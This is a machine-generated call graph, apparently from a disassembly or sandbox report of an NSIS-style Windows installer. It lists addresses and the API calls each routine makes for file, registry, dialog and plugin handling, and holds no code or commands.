4827->4828 4830 403332 4828->4830 4829 40333c 4829->4765 4830->4829 4831 405935 3 API calls 4830->4831 4832 403344 CreateDirectoryW 4831->4832 4933 405b85 4832->4933 4937 405b56 GetFileAttributesW CreateFileW 4835->4937 4837 402dff 4864 402e0c 4837->4864 4938 405eea lstrcpynW 4837->4938 4839 402e22 4840 405981 2 API calls 4839->4840 4841 402e28 4840->4841 4939 405eea lstrcpynW 4841->4939 4843 402e33 GetFileSize 4844 402f34 4843->4844 4862 402e4a 4843->4862 4845 402d1a 33 API calls 4844->4845 4846 402f3b 4845->4846 4848 402f77 GlobalAlloc 4846->4848 4846->4864 4941 40330f SetFilePointer 4846->4941 4847 4032f9 ReadFile 4847->4862 4852 402f8e 4848->4852 4849 402fcf 4850 402d1a 33 API calls 4849->4850 4850->4864 4854 405b85 2 API calls 4852->4854 4853 402f58 4855 4032f9 ReadFile 4853->4855 4857 402f9f CreateFileW 4854->4857 4858 402f63 4855->4858 4856 402d1a 33 API calls 4856->4862 4859 402fd9 4857->4859 4857->4864 4858->4848 4858->4864 4940 40330f SetFilePointer 4859->4940 4861 402fe7 4863 403062 46 API calls 4861->4863 4862->4844 4862->4847 4862->4849 4862->4856 4862->4864 4863->4864 4864->4773 4866 406254 3 API calls 4865->4866 4867 4038c8 4866->4867 4868 4038e0 4867->4868 4869 4038ce 4867->4869 4870 405db7 3 API calls 4868->4870 4951 405e31 wsprintfW 4869->4951 4871 403910 4870->4871 4873 40392f lstrcatW 4871->4873 4875 405db7 3 API calls 4871->4875 4874 4038de 4873->4874 4942 403b8a 4874->4942 4875->4873 4878 405a3d 18 API calls 4879 403961 4878->4879 4880 4039f5 4879->4880 4883 405db7 3 API calls 4879->4883 4881 405a3d 18 API calls 4880->4881 4882 4039fb 4881->4882 4885 403a0b LoadImageW 4882->4885 4886 405f0c 18 API calls 4882->4886 4884 403993 4883->4884 4884->4880 4889 4039b4 lstrlenW 4884->4889 4893 405962 CharNextW 4884->4893 4887 403ab1 4885->4887 4888 403a32 RegisterClassW 4885->4888 4886->4885 4892 40140b 2 API calls 4887->4892 4890 403abb 4888->4890 4891 403a68 SystemParametersInfoW CreateWindowExW 4888->4891 4894 4039c2 lstrcmpiW 4889->4894 4895 4039e8 4889->4895 4890->4776 4891->4887 4896 403ab7 4892->4896 4897 4039b1 4893->4897 4894->4895 4898 4039d2 GetFileAttributesW 4894->4898 4899 405935 3 API calls 4895->4899 4896->4890 4901 403b8a 19 API calls 4896->4901 4897->4889 4900 4039de 4898->4900 4902 4039ee 4899->4902 4900->4895 4903 405981 2 API calls 4900->4903 4904 403ac8 4901->4904 4952 405eea lstrcpynW 4902->4952 4903->4895 4906 403ad4 ShowWindow LoadLibraryW 4904->4906 4907 403b57 4904->4907 4909 403af3 LoadLibraryW 4906->4909 4910 403afa GetClassInfoW 4906->4910 4953 405267 OleInitialize 4907->4953 4909->4910 4911 403b24 DialogBoxParamW 4910->4911 4912 403b0e GetClassInfoW RegisterClassW 4910->4912 4914 40140b 2 API calls 4911->4914 4912->4911 4913 403b5d 4915 403b61 4913->4915 4916 403b79 4913->4916 4914->4890 4915->4890 4918 40140b 2 API calls 4915->4918 4917 40140b 2 API calls 4916->4917 4917->4890 4918->4890 4919->4763 4920->4808 4921->4779 4923 4037d3 CloseHandle 4922->4923 4924 4037dd 4922->4924 4923->4924 4925 4037f1 4924->4925 4926 4037e7 CloseHandle 4924->4926 4961 40381f 4925->4961 4926->4925 4929 405772 71 API calls 4930 403621 OleUninitialize 4929->4930 4930->4785 4930->4786 4931->4800 4932->4822 4934 405b92 GetTickCount GetTempFileNameW 4933->4934 4935 405bc8 4934->4935 4936 403358 4934->4936 4935->4934 4935->4936 4936->4765 4937->4837 4938->4839 4939->4843 4940->4861 4941->4853 4943 403b9e 4942->4943 4960 405e31 wsprintfW 4943->4960 4945 403c0f 4946 405f0c 18 API calls 4945->4946 4947 403c1b SetWindowTextW 4946->4947 4948 40393f 4947->4948 4949 403c37 4947->4949 4948->4878 4949->4948 4950 405f0c 18 API calls 4949->4950 4950->4949 4951->4874 4952->4880 4954 40417b SendMessageW 4953->4954 4955 40528a 4954->4955 4958 401389 2 API calls 4955->4958 4959 4052b1 4955->4959 4956 40417b SendMessageW 4957 4052c3 OleUninitialize 4956->4957 4957->4913 4958->4955 4959->4956 4960->4945 4962 40382d 4961->4962 4963 4037f6 4962->4963 4964 403832 FreeLibrary GlobalFree 4962->4964 4963->4929 4964->4963 4964->4964 5233 40155b 5234 40296d 5233->5234 5237 405e31 wsprintfW 5234->5237 5236 402972 5237->5236 3902 4023e0 3913 402c44 3902->3913 3904 4023ea 3917 402b3a 3904->3917 3907 4023fe RegQueryValueExW 3908 402424 RegCloseKey 3907->3908 3909 40241e 3907->3909 3912 402793 3908->3912 3909->3908 3923 405e31 wsprintfW 3909->3923 3914 402b3a 18 API calls 3913->3914 3915 402c5d 3914->3915 3916 402c6b RegOpenKeyExW 3915->3916 3916->3904 3918 402b46 3917->3918 3924 405f0c 3918->3924 3921 4023f3 3921->3907 3921->3912 3923->3908 3925 405f19 3924->3925 3926 406164 3925->3926 3929 405fcc GetVersion 3925->3929 3930 406132 lstrlenW 3925->3930 3932 405f0c 10 API calls 3925->3932 3935 406047 GetSystemDirectoryW 3925->3935 3936 40605a GetWindowsDirectoryW 3925->3936 3937 40617e 5 API calls 3925->3937 3938 405f0c 10 API calls 3925->3938 3939 4060d3 lstrcatW 3925->3939 3940 40608e SHGetSpecialFolderLocation 3925->3940 3951 405db7 RegOpenKeyExW 3925->3951 3956 405e31 wsprintfW 3925->3956 3957 405eea lstrcpynW 3925->3957 3927 402b67 3926->3927 3958 405eea lstrcpynW 3926->3958 3927->3921 3942 40617e 3927->3942 3929->3925 3930->3925 3932->3930 3935->3925 3936->3925 3937->3925 3938->3925 3939->3925 3940->3925 3941 4060a6 SHGetPathFromIDListW CoTaskMemFree 3940->3941 3941->3925 3943 40618b 3942->3943 3945 4061f4 CharNextW 3943->3945 3947 406201 3943->3947 3949 4061e0 CharNextW 3943->3949 3950 4061ef CharNextW 3943->3950 3959 405962 3943->3959 3944 406206 CharPrevW 3944->3947 3945->3943 3945->3947 3947->3944 3948 406227 3947->3948 3948->3921 3949->3943 3950->3945 3952 405e2b 3951->3952 3953 405deb RegQueryValueExW 3951->3953 3952->3925 3954 405e0c RegCloseKey 3953->3954 3954->3952 3956->3925 3957->3925 3958->3927 3960 405968 3959->3960 3961 40597e 3960->3961 3962 40596f CharNextW 3960->3962 3961->3943 3962->3960 5245 401ce5 GetDlgItem GetClientRect 5246 402b3a 18 API calls 5245->5246 5247 401d17 LoadImageW SendMessageW 5246->5247 5248 401d35 DeleteObject 5247->5248 5249 4029c7 5247->5249 5248->5249 5250 401de8 EnableWindow 5251 4029c7 5250->5251 5252 40206a 5253 402b3a 18 API calls 5252->5253 5254 402071 5253->5254 5255 402b3a 18 API calls 5254->5255 5256 40207b 5255->5256 5257 402b3a 18 API calls 5256->5257 5258 402084 5257->5258 5259 402b3a 18 API calls 5258->5259 5260 40208e 5259->5260 5261 402b3a 18 API calls 5260->5261 5262 402098 5261->5262 5263 4020ac CoCreateInstance 5262->5263 5264 402b3a 18 API calls 5262->5264 5267 4020cb 5263->5267 5264->5263 5265 401423 25 API calls 5266 402197 5265->5266 5267->5265 5267->5266 5268 40156b 5269 401584 5268->5269 5270 40157b ShowWindow 5268->5270 5271 401592 ShowWindow 5269->5271 5272 4029c7 5269->5272 5270->5269 5271->5272 5273 4024ee 5274 4024f3 5273->5274 5275 40250c 5273->5275 5276 402b1d 18 API calls 5274->5276 5277 402512 5275->5277 5278 40253e 5275->5278 5281 4024fa 5276->5281 5279 402b3a 18 API calls 5277->5279 5280 402b3a 18 API calls 5278->5280 5282 402519 WideCharToMultiByte lstrlenA 5279->5282 5283 402545 lstrlenW 5280->5283 5284 402567 WriteFile 5281->5284 5285 402793 5281->5285 5282->5281 5283->5281 5284->5285 5286 4018ef 5287 401926 5286->5287 5288 402b3a 18 API calls 5287->5288 5289 40192b 5288->5289 5290 405772 71 API calls 5289->5290 5291 401934 5290->5291 5292 402770 5293 402b3a 18 API calls 5292->5293 5294 402777 FindFirstFileW 5293->5294 5295 40278a 5294->5295 5296 40279f 5294->5296 5297 4027a8 5296->5297 5300 405e31 wsprintfW 5296->5300 5301 405eea lstrcpynW 5297->5301 5300->5297 5301->5295 5302 4014f1 SetForegroundWindow 5303 4029c7 5302->5303 5304 403872 5305 40387d 5304->5305 5306 403881 5305->5306 5307 403884 GlobalAlloc 5305->5307 5307->5306 5308 4018f2 5309 402b3a 18 API calls 5308->5309 5310 4018f9 5309->5310 5311 4056c6 MessageBoxIndirectW 5310->5311 5312 401902 5311->5312 5313 402573 5314 402b1d 18 API calls 5313->5314 5316 402582 5314->5316 5315 4026a0 5316->5315 5317 4025c8 ReadFile 5316->5317 5318 405bd9 ReadFile 5316->5318 5319 4026a2 5316->5319 5320 402608 MultiByteToWideChar 5316->5320 5322 4026b3 5316->5322 5323 40262e SetFilePointer MultiByteToWideChar 5316->5323 5317->5315 5317->5316 5318->5316 5325 405e31 wsprintfW 5319->5325 5320->5316 5322->5315 5324 4026d4 SetFilePointer 5322->5324 5323->5316 5324->5315 5325->5315 5326 401df3 5327 402b3a 18 API calls 5326->5327 5328 401df9 5327->5328 5329 402b3a 18 API calls 5328->5329 5330 401e02 5329->5330 5331 402b3a 18 API calls 5330->5331 5332 401e0b 5331->5332 5333 402b3a 18 API calls 5332->5333 5334 401e14 5333->5334 5335 401423 25 API calls 5334->5335 5336 401e1b ShellExecuteW 5335->5336 5337 401e4c 5336->5337 5357 4026f9 5358 402700 5357->5358 5361 402972 5357->5361 5359 402b1d 18 API calls 5358->5359 5360 40270b 5359->5360 5362 402712 SetFilePointer 5360->5362 5362->5361 5363 402722 5362->5363 5365 405e31 wsprintfW 5363->5365 5365->5361 5373 1000103d 5374 1000101b 8 API calls 5373->5374 5375 10001056 5374->5375 5376 40427d lstrlenW 5377 40429c 5376->5377 5378 40429e WideCharToMultiByte 5376->5378 5377->5378 5379 402c7f 5380 402c91 SetTimer 5379->5380 5381 402caa 5379->5381 5380->5381 5382 402cf8 5381->5382 5383 402cfe MulDiv 5381->5383 5384 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5383->5384 5384->5382 5386 4014ff 5387 401507 5386->5387 5389 40151a 5386->5389 5388 402b1d 18 API calls 5387->5388 5388->5389 5390 401000 5391 401037 BeginPaint GetClientRect 5390->5391 5394 40100c DefWindowProcW 5390->5394 5392 4010f3 5391->5392 5396 401073 CreateBrushIndirect FillRect DeleteObject 5392->5396 5397 4010fc 5392->5397 5395 401179 5394->5395 5396->5392 5398 401102 CreateFontIndirectW 5397->5398 5399 401167 EndPaint 5397->5399 5398->5399 5400 401112 6 API calls 5398->5400 5399->5395 5400->5399 5401 401a00 5402 402b3a 18 API calls 5401->5402 5403 401a09 ExpandEnvironmentStringsW 5402->5403 5404 401a30 5403->5404 5405 401a1d 5403->5405 5405->5404 5406 401a22 lstrcmpW 5405->5406 5406->5404 5407 401b01 5408 402b3a 18 API calls 5407->5408 5409 401b08 5408->5409 5410 402b1d 18 API calls 5409->5410 5411 401b11 wsprintfW 5410->5411 5412 4029c7 5411->5412 5413 100018c1 5414 10001243 3 API calls 5413->5414 5415 100018e7 5414->5415 5416 10001243 3 API calls 5415->5416 5417 100018ef 5416->5417 5418 10001243 3 API calls 5417->5418 5420 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5417->5420 5419 10001916 5418->5419 5421 1000191f GlobalFree 5419->5421 5422 10001280 2 API calls 5420->5422 5421->5420 5423 10001aad GlobalFree GlobalFree 5422->5423 5424 10002a43 5425 10002a5b 5424->5425 5426 100015a7 2 API calls 5425->5426 5427 10002a76 5426->5427 5428 404583 5429 404593 5428->5429 5430 4045b9 5428->5430 5431 40412f 19 API calls 5429->5431 5432 404196 8 API calls 5430->5432 5433 4045a0 SetDlgItemTextW 5431->5433 5434 4045c5 5432->5434 5433->5430 4133 405108 4134 405118 4133->4134 4135 40512c 4133->4135 4137 405175 4134->4137 4138 40511e 4134->4138 4136 405134 IsWindowVisible 4135->4136 4141 405154 4135->4141 4136->4137 4140 405141 4136->4140 4142 40517a CallWindowProcW 4137->4142 4147 40417b 4138->4147 4150 404a5e SendMessageW 4140->4150 4141->4142 4155 404ade 4141->4155 4143 405128 4142->4143 4148 404193 4147->4148 4149 404184 SendMessageW 4147->4149 4148->4143 4149->4148 4151 404a81 GetMessagePos ScreenToClient SendMessageW 4150->4151 4152 404abd SendMessageW 4150->4152 4153 404ab5 4151->4153 4154 404aba 4151->4154 4152->4153 4153->4141 4154->4152 4164 405eea lstrcpynW 4155->4164 4157 404af1 4165 405e31 wsprintfW 4157->4165 4159 404afb 4166 40140b 4159->4166 4163 404b0b 4163->4137 4164->4157 4165->4159 4170 401389 4166->4170 4169 405eea lstrcpynW 4169->4163 4172 401390 4170->4172 4171 4013fe 4171->4169 4172->4171 4173 4013cb MulDiv SendMessageW 4172->4173 4173->4172 5435 401f08 5436 402b3a 18 API calls 5435->5436 5437 401f0f GetFileVersionInfoSizeW 5436->5437 5438 401f36 GlobalAlloc 5437->5438 5439 401f8c 5437->5439 5438->5439 5440 401f4a GetFileVersionInfoW 5438->5440 5440->5439 5441 401f59 VerQueryValueW 5440->5441 5441->5439 5442 401f72 5441->5442 5446 405e31 wsprintfW 5442->5446 5444 401f7e 5447 405e31 wsprintfW 5444->5447 5446->5444 5447->5439 5455 1000224c 5456 100022b1 5455->5456 5457 100022e7 5455->5457 5456->5457 5458 100022c3 GlobalAlloc 5456->5458 5458->5456 5459 100016ce 5460 100016fd 5459->5460 5461 10001b3e 24 API calls 5460->5461 5462 10001704 5461->5462 5463 10001717 5462->5463 5464 1000170b 5462->5464 5466 10001721 5463->5466 5467 1000173e 5463->5467 5465 10001280 2 API calls 5464->5465 5470 10001715 5465->5470 5471 10001555 3 API calls 5466->5471 5468 10001744 5467->5468 5469 10001768 5467->5469 5472 100015cc 3 API calls 5468->5472 5473 10001555 3 API calls 5469->5473 5474 10001726 5471->5474 5475 10001749 5472->5475 5473->5470 5476 100015cc 3 API calls 5474->5476 5478 10001280 2 API calls 5475->5478 5477 1000172c 5476->5477 5479 10001280 2 API calls 5477->5479 5480 1000174f GlobalFree 5478->5480 5481 10001732 GlobalFree 5479->5481 5480->5470 5482 10001763 GlobalFree 5480->5482 5481->5470 5482->5470 4177 404b10 GetDlgItem GetDlgItem 4178 404b62 7 API calls 4177->4178 4181 404d7b 4177->4181 4179 404c05 DeleteObject 4178->4179 4180 404bf8 SendMessageW 4178->4180 4182 404c0e 4179->4182 4180->4179 4190 404e5f 4181->4190 4191 404e40 4181->4191 4195 404ddb 4181->4195 4183 404c45 4182->4183 4184 404c1d 4182->4184 4233 40412f 4183->4233 4187 405f0c 18 API calls 4184->4187 4186 404f0b 4192 404f15 SendMessageW 4186->4192 4193 404f1d 4186->4193 4194 404c27 SendMessageW SendMessageW 4187->4194 4188 404c59 4197 40412f 19 API calls 4188->4197 4189 4050f3 4246 404196 4189->4246 4190->4186 4190->4189 4198 404eb8 SendMessageW 4190->4198 4191->4190 4200 404e51 SendMessageW 4191->4200 4192->4193 4201 404f36 4193->4201 4202 404f2f ImageList_Destroy 4193->4202 4209 404f46 4193->4209 4194->4182 4196 404a5e 5 API calls 4195->4196 4214 404dec 4196->4214 4215 404c67 4197->4215 4198->4189 4204 404ecd SendMessageW 4198->4204 4200->4190 4206 404f3f GlobalFree 4201->4206 4201->4209 4202->4201 4203 4050b5 4203->4189 4210 4050c7 ShowWindow GetDlgItem ShowWindow 4203->4210 4208 404ee0 4204->4208 4206->4209 4207 404d3c GetWindowLongW SetWindowLongW 4211 404d55 4207->4211 4219 404ef1 SendMessageW 4208->4219 4209->4203 4223 404ade 4 API calls 4209->4223 4227 404f81 4209->4227 4210->4189 4212 404d73 4211->4212 4213 404d5b ShowWindow 4211->4213 4237 404164 SendMessageW 4212->4237 4236 404164 SendMessageW 4213->4236 4214->4191 4215->4207 4218 404cb7 SendMessageW 4215->4218 4220 404d36 4215->4220 4221 404cf3 SendMessageW 4215->4221 4222 404d04 SendMessageW 4215->4222 4218->4215 4219->4186 4220->4207 4220->4211 4221->4215 4222->4215 4223->4227 4224 404d6e 4224->4189 4225 40508b InvalidateRect 4225->4203 4226 4050a1 4225->4226 4238 404978 4226->4238 4228 404faf SendMessageW 4227->4228 4229 404fc5 4227->4229 4228->4229 4229->4225 4231 405026 4229->4231 4232 405039 SendMessageW SendMessageW 4229->4232 4231->4232 4232->4229 4234 405f0c 18 API calls 4233->4234 4235 40413a SetDlgItemTextW 4234->4235 4235->4188 4236->4224 4237->4181 4239 404995 4238->4239 4240 405f0c 18 API calls 4239->4240 4241 4049ca 4240->4241 4242 405f0c 18 API calls 4241->4242 4243 4049d5 4242->4243 4244 405f0c 18 API calls 4243->4244 4245 404a06 lstrlenW wsprintfW SetDlgItemTextW 4244->4245 4245->4203 4247 4041ae GetWindowLongW 4246->4247 4257 404237 4246->4257 4248 4041bf 4247->4248 4247->4257 4249 4041d1 4248->4249 4250 4041ce GetSysColor 4248->4250 4251 4041e1 SetBkMode 4249->4251 4252 4041d7 SetTextColor 4249->4252 4250->4249 4253 4041f9 GetSysColor 4251->4253 4254 4041ff 4251->4254 4252->4251 4253->4254 4255 404210 4254->4255 4256 404206 SetBkColor 4254->4256 4255->4257 4258 404223 DeleteObject 4255->4258 4259 40422a CreateBrushIndirect 4255->4259 4256->4255 4258->4259 4259->4257 5483 401491 5484 405194 25 API calls 5483->5484 5485 401498 5484->5485 5486 404912 5487 404922 5486->5487 5488 40493e 5486->5488 5497 4056aa GetDlgItemTextW 5487->5497 5490 404971 5488->5490 5491 404944 SHGetPathFromIDListW 5488->5491 5493 40495b SendMessageW 5491->5493 5494 404954 5491->5494 5492 40492f SendMessageW 5492->5488 5493->5490 5495 40140b 2 API calls 5494->5495 5495->5493 5497->5492 4447 402295 4448 402b3a 18 API calls 4447->4448 4449 4022a4 4448->4449 4450 402b3a 18 API calls 4449->4450 4451 4022ad 4450->4451 4452 402b3a 18 API calls 4451->4452 4453 4022b7 GetPrivateProfileStringW 4452->4453 4536 401f98 4537 40205c 4536->4537 4538 401faa 4536->4538 4541 401423 25 API calls 4537->4541 4539 402b3a 18 API calls 4538->4539 4540 401fb1 4539->4540 4542 402b3a 18 API calls 4540->4542 4547 402197 4541->4547 4543 401fba 4542->4543 4544 401fd0 LoadLibraryExW 4543->4544 4545 401fc2 GetModuleHandleW 4543->4545 4544->4537 4546 401fe1 4544->4546 4545->4544 4545->4546 4559 4062c0 WideCharToMultiByte 4546->4559 4550 401ff2 4553 402011 4550->4553 4554 401ffa 4550->4554 4551 40202b 4552 405194 25 API calls 4551->4552 4555 402002 4552->4555 4562 10001771 4553->4562 4604 401423 4554->4604 4555->4547 4557 40204e FreeLibrary 4555->4557 4557->4547 4560 4062ea GetProcAddress 4559->4560 4561 401fec 4559->4561 4560->4561 4561->4550 4561->4551 4563 100017a1 4562->4563 4607 10001b3e 4563->4607 4565 100017a8 4566 100018be 4565->4566 4567 100017c0 4565->4567 4568 100017b9 4565->4568 4566->4555 4641 100022eb 4567->4641 4659 100022a1 4568->4659 4573 10001824 4577 10001866 4573->4577 4578 1000182a 4573->4578 4574 10001806 4672 1000248d 4574->4672 4575 100017d6 4580 100017dc 4575->4580 4581 100017e7 4575->4581 4576 100017ef 4588 100017e5 4576->4588 4669 10002b23 4576->4669 4585 1000248d 10 API calls 4577->4585 4583 100015cc 3 API calls 4578->4583 4580->4588 4653 10002868 4580->4653 4663 1000260b 4581->4663 4590 10001840 4583->4590 4591 10001858 4585->4591 4588->4573 4588->4574 4594 1000248d 10 API calls 4590->4594 4603 100018ad 4591->4603 4695 10002450 4591->4695 4593 100017ed 4593->4588 4594->4591 4597 100018b7 GlobalFree 4597->4566 4600 10001899 4600->4603 4699 10001555 wsprintfW 4600->4699 4601 10001892 FreeLibrary 4601->4600 4603->4566 4603->4597 4605 405194 25 API calls 4604->4605 4606 401431 4605->4606 4606->4555 4702 1000121b GlobalAlloc 4607->4702 4609 10001b62 4703 1000121b GlobalAlloc 4609->4703 4611 10001b6d 4704 10001243 4611->4704 4613 10001da0 GlobalFree GlobalFree GlobalFree 4614 10001dbd 4613->4614 4628 10001e07 4613->4628 4615 1000210d 4614->4615 4623 10001dd2 4614->4623 4614->4628 4617 1000212f GetModuleHandleW 4615->4617 4615->4628 4616 10001c43 GlobalAlloc 4638 10001b75 4616->4638 4618 10002140 LoadLibraryW 4617->4618 4619 10002155 4617->4619 4618->4619 4618->4628 4715 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4619->4715 4620 10001c8e lstrcpyW 4624 10001c98 lstrcpyW 4620->4624 4621 10001cac GlobalFree 4621->4638 4623->4628 4711 1000122c 4623->4711 4624->4638 4625 100021a7 4627 100021b4 lstrlenW 4625->4627 4625->4628 4716 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4627->4716 4628->4565 4629 10002167 4629->4625 4640 10002191 GetProcAddress 4629->4640 4630 10002067 4630->4628 4633 100020af lstrcpyW 4630->4633 4633->4628 4634 10001cea 4634->4638 4709 100015a7 GlobalSize GlobalAlloc 4634->4709 4635 10001f56 GlobalFree 4635->4638 4636 100021ce 4636->4628 4638->4613 4638->4616 4638->4620 4638->4621 4638->4624 4638->4628 4638->4630 4638->4634 4638->4635 4639 1000122c 2 API calls 4638->4639 4714 1000121b GlobalAlloc 4638->4714 4639->4638 4640->4625 4649 10002303 4641->4649 4642 1000122c GlobalAlloc lstrcpynW 4642->4649 4643 10001243 3 API calls 4643->4649 4645 10002419 GlobalFree 4646 100017c6 4645->4646 4645->4649 4646->4575 4646->4576 4646->4588 4647 100023d5 GlobalAlloc WideCharToMultiByte 4647->4645 4648 100023ae GlobalAlloc CLSIDFromString 4648->4645 4649->4642 4649->4643 4649->4645 4649->4647 4649->4648 4650 10002390 lstrlenW 4649->4650 4719 100012c8 4649->4719 4650->4645 4652 1000239b 4650->4652 4652->4645 4724 1000259f 4652->4724 4655 1000287a 4653->4655 4654 1000291f ReadFile 4656 1000293d 4654->4656 4655->4654 4657 10002a39 4656->4657 4658 10002a2e GetLastError 4656->4658 4657->4588 4658->4657 4660 100022b1 4659->4660 4662 100017bf 4659->4662 4661 100022c3 GlobalAlloc 4660->4661 4660->4662 4661->4660 4662->4567 4667 10002627 4663->4667 4664 10002678 GlobalAlloc 4668 1000269a 4664->4668 4665 1000268b 4666 10002690 GlobalSize 4665->4666 4665->4668 4666->4668 4667->4664 4667->4665 4668->4593 4670 10002b2e 4669->4670 4671 10002b6e GlobalFree 4670->4671 4676 100024ad 4672->4676 4674 100024db wsprintfW 4674->4676 4675 10002581 GlobalFree 4675->4676 4679 1000180c 4675->4679 4676->4674 4676->4675 4677 10002558 GlobalFree 4676->4677 4678 1000250e MultiByteToWideChar 4676->4678 4680 100024fd lstrcpynW 4676->4680 4681 100024ec StringFromGUID2 4676->4681 4682 10001280 2 API calls 4676->4682 4727 1000121b GlobalAlloc 4676->4727 4728 100012f3 4676->4728 4677->4676 4678->4676 4684 100015cc 4679->4684 4680->4676 4681->4676 4682->4676 4732 1000121b GlobalAlloc 4684->4732 4686 100015d2 4688 100015df lstrcpyW 4686->4688 4689 100015f9 4686->4689 4690 10001613 4688->4690 4689->4690 4691 100015fe wsprintfW 4689->4691 4692 10001280 4690->4692 4691->4690 4693 100012c3 GlobalFree 4692->4693 4694 10001289 GlobalAlloc lstrcpynW 4692->4694 4693->4591 4694->4693 4696 1000245e 4695->4696 4698 10001879 4695->4698 4697 1000247a GlobalFree 4696->4697 4696->4698 4697->4696 4698->4600 4698->4601 4700 10001280 2 API calls 4699->4700 4701 10001576 4700->4701 4701->4603 4702->4609 4703->4611 4705 1000127c 4704->4705 4706 1000124d 4704->4706 4705->4638 4706->4705 4717 1000121b GlobalAlloc 4706->4717 4708 10001259 lstrcpyW GlobalFree 4708->4638 4710 100015c5 4709->4710 4710->4634 4718 1000121b GlobalAlloc 4711->4718 4713 1000123b lstrcpynW 4713->4628 4714->4638 4715->4629 4716->4636 4717->4708 4718->4713 4720 100012ee 4719->4720 4721 100012d0 4719->4721 4720->4720 4721->4720 4722 1000122c 2 API calls 4721->4722 4723 100012ec 4722->4723 4723->4649 4725 10002603 4724->4725 4726 100025ad VirtualAlloc 4724->4726 4725->4652 4726->4725 4727->4676 4729 10001324 4728->4729 4730 100012fc 4728->4730 4729->4676 4730->4729 4731 10001308 lstrcpyW 4730->4731 4731->4729 4732->4686 5498 10001058 5499 10001243 3 API calls 5498->5499 5501 10001074 5499->5501 5500 100010dd 5501->5500 5502 1000152e 4 API calls 5501->5502 5503 10001092 5501->5503 5502->5503 5504 1000152e 4 API calls 5503->5504 5505 100010a2 5504->5505 5506 100010b2 5505->5506 5507 100010a9 GlobalSize 5505->5507 5508 100010b6 GlobalAlloc 5506->5508 5509 100010c7 5506->5509 5507->5506 5510 10001555 3 API calls 5508->5510 5511 100010d2 GlobalFree 5509->5511 5510->5509 5511->5500 5512 401718 5513 402b3a 18 API calls 5512->5513 5514 40171f SearchPathW 5513->5514 5515 40173a 5514->5515 4965 40159b 4966 402b3a 18 API calls 4965->4966 4967 4015a2 SetFileAttributesW 4966->4967 4968 4015b4 4967->4968 5516 40149e 5517 4014ac PostQuitMessage 5516->5517 5518 40223e 5516->5518 5517->5518 5519 4021a0 5520 402b3a 18 API calls 5519->5520 5521 4021a6 5520->5521 5522 402b3a 18 API calls 5521->5522 5523 4021af 5522->5523 5524 402b3a 18 API calls 5523->5524 5525 4021b8 5524->5525 5526 40622d 2 API calls 5525->5526 5527 4021c1 5526->5527 5528 4021d2 lstrlenW lstrlenW 5527->5528 5529 4021c5 5527->5529 5531 405194 25 API calls 5528->5531 5530 405194 25 API calls 5529->5530 5533 4021cd 5529->5533 5530->5533 5532 402210 SHFileOperationW 5531->5532 5532->5529 5532->5533 5534 100010e1 5535 10001111 5534->5535 5536 10001243 3 API calls 5535->5536 5546 10001121 5536->5546 5537 100011d8 GlobalFree 5538 100012c8 2 API calls 5538->5546 5539 100011d3 5539->5537 5540 10001243 3 API calls 5540->5546 5541 10001280 2 API calls 5544 100011c4 GlobalFree 5541->5544 5542 10001164 GlobalAlloc 5542->5546 5543 100011f8 GlobalFree 5543->5546 5544->5546 5545 100012f3 lstrcpyW 5545->5546 5546->5537 5546->5538 5546->5539 5546->5540 5546->5541 5546->5542 5546->5543 5546->5544 5546->5545 3963 401b22 3964 401b73 3963->3964 3965 401b2f 3963->3965 3966 401b78 3964->3966 3967 401b9d GlobalAlloc 3964->3967 3970 401b46 3965->3970 3972 401bb8 3965->3972 3975 40223e 3966->3975 3984 405eea lstrcpynW 3966->3984 3969 405f0c 18 API calls 3967->3969 3968 405f0c 18 API calls 3974 402238 3968->3974 3969->3972 3982 405eea lstrcpynW 3970->3982 3972->3968 3972->3975 3985 4056c6 3974->3985 3976 401b8a GlobalFree 3976->3975 3977 401b55 3983 405eea lstrcpynW 3977->3983 3980 401b64 3989 405eea lstrcpynW 3980->3989 3982->3977 3983->3980 3984->3976 3986 4056db 3985->3986 3987 405727 3986->3987 3988 4056ef MessageBoxIndirectW 3986->3988 3987->3975 3988->3987 3989->3975 5547 4029a2 SendMessageW 5548 4029bc InvalidateRect 5547->5548 5549 4029c7 5547->5549 5548->5549 3990 401924 3991 401926 3990->3991 3992 402b3a 18 API calls 3991->3992 3993 40192b 3992->3993 3996 405772 3993->3996 4035 405a3d 3996->4035 3999 4057b1 4006 4058d1 3999->4006 4049 405eea lstrcpynW 3999->4049 4000 40579a DeleteFileW 4001 401934 4000->4001 4003 4057d7 4004 4057ea 4003->4004 4005 4057dd lstrcatW 4003->4005 4050 405981 lstrlenW 4004->4050 4007 4057f0 4005->4007 4006->4001 4079 40622d FindFirstFileW 4006->4079 4010 405800 lstrcatW 4007->4010 4013 40580b lstrlenW FindFirstFileW 4007->4013 4010->4013 4012 4058fa 4082 405935 lstrlenW CharPrevW 4012->4082 4013->4006 4020 40582d 4013->4020 4016 4058b4 FindNextFileW 4016->4020 4021 4058ca FindClose 4016->4021 4017 40572a 5 API calls 4019 40590c 4017->4019 4022 405910 4019->4022 4023 405926 4019->4023 4020->4016 4031 405875 4020->4031 4054 405eea lstrcpynW 4020->4054 4021->4006 4022->4001 4026 405194 25 API calls 4022->4026 4025 405194 25 API calls 4023->4025 4025->4001 4028 40591d 4026->4028 4027 405772 64 API calls 4027->4031 4030 405d84 40 API calls 4028->4030 4029 405194 25 API calls 4029->4016 4032 405924 4030->4032 4031->4016 4031->4027 4031->4029 4055 40572a 4031->4055 4063 405194 4031->4063 4074 405d84 4031->4074 4032->4001 4085 405eea lstrcpynW 4035->4085 4037 405a4e 4086 4059e0 CharNextW CharNextW 4037->4086 4040 405792 4040->3999 4040->4000 4041 40617e 5 API calls 4047 405a64 4041->4047 4042 405a95 lstrlenW 4043 405aa0 4042->4043 4042->4047 4045 405935 3 API calls 4043->4045 4044 40622d 2 API calls 4044->4047 4046 405aa5 GetFileAttributesW 4045->4046 4046->4040 4047->4040 4047->4042 4047->4044 4048 405981 2 API calls 4047->4048 4048->4042 4049->4003 4051 40598f 4050->4051 4052 4059a1 4051->4052 4053 405995 CharPrevW 4051->4053 4052->4007 4053->4051 4053->4052 4054->4020 4092 405b31 GetFileAttributesW 4055->4092 4058 405745 RemoveDirectoryW 4061 405753 4058->4061 4059 40574d DeleteFileW 4059->4061 4060 405757 4060->4031 4061->4060 4062 405763 SetFileAttributesW 